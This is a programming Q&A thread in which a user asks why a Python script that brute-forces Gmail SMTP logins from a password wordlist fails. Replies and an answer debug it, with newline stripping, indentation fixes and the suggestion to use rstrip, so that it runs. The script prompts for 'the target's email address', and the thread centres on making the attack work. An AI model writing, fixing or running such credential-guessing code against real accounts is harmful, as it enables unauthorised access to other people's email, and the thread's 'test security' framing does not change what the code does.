# Why Isnt my Gmail Account Bruteforcer Working?

Tags: python, brute-force

I recently have just finished my python google brute force to test security.
I have put in the correct password for my account & with the email but it doesn't say that it's correct.

I dont think that it is because the checker is old. I think I may be doing something wrong with the port with the smtp.gmail.com

Here's my code

```
import smtplib

smtp_srverG= smtplib.SMTP('smtp.gmail.com', 587)
smtp_srverG.ehlo()
smtp_srverG.starttls()

user = input("Enter the target's email address: ")
passwfile = input("Enter the password file name: ")
passwfile = open(passwfile, "r")

for password in passwfile:
        try:
                smtp_srverG.login(user, password)

                print("[+] Password Found: %s" % password)
                break;
        except smtplib.SMTPAuthenticationError:
                print("[!] Password Incorrect: %s" % password)
```

Thanks

Some people have responded but haven't replied

Comment: When you use `for password in passwfile` to get the lines from a file, the lines will have a carriage return `\n` at the end.  You can use `password = password.strip()` at the top of the loop to remove the trailing carriage return.

Comment: @John Please post that as an answer, and please don't post answers in the comments. BTW carriage return is `\r`, newline is `\n`

Comment: Should my code look like this?
https://pastebin.com/Hk5YaAGp

Comment: @Grapie No, read John's comment more carefully. "Top of the loop" means "at the start of each loop"

Comment: I'm now getting the error pastebin.com/7VDQDxbY
My code is pastebin.com/1FR1RE8m 

I did what he said

Comment: What do you mean by "Some people have responded but haven't replied"?

Answer (score 1):

When you use `for password in passwfile` to get the lines from a file, the lines will have a newline `\n` at the end.

You can use `password = password.strip()` at the top of the loop to remove the trailing newline:

```
for password in passwfile:
    password = password.strip()
    try:
        smtp_srverG.login(user, password)
        ...
```

Comment: I'm now getting the error
https://pastebin.com/7VDQDxbY

Comment: My code is https://pastebin.com/1FR1RE8m

Comment: All of the code in the `try` block should be indented at the same level.  But you have the `print()` statement indented lot further than the `smtp_srverG.login()` statement.

Comment: Should probably use `password.rstrip('\n')` instead of `password.strip()` in case of legit leading/trailing whitespace in a password, though that's probably rare.

Comment: Hey I did all of these steps & it still is saying the password is incorrect.
The bruteforce now runs though.

Comment: If there's more than one password in the file, then of course only one of them will be correct, and you will get an error for the rest.